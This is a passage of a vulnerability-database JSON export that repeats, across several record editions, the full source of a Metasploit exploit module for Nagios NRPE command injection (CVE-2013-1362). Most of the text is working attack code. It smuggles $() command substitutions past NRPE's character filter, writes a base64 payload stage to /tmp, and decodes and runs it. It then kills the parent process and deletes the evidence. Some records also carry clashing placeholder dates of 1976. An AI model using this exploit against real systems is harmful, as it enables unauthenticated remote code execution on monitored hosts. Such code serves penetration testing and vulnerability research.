print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-06T22:15:15", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-07T00:19:28", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-07T00:19:28"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-07T00:19:28", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-07T02:16:10", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-07T02:16:10"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-07T02:16:10", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-25T11:05:10", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-25T11:05:10"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-25T11:05:10", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-25T12:55:42", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-25T12:55:42"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-25T12:55:42", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-27T12:58:46", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-27T12:58:46"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": 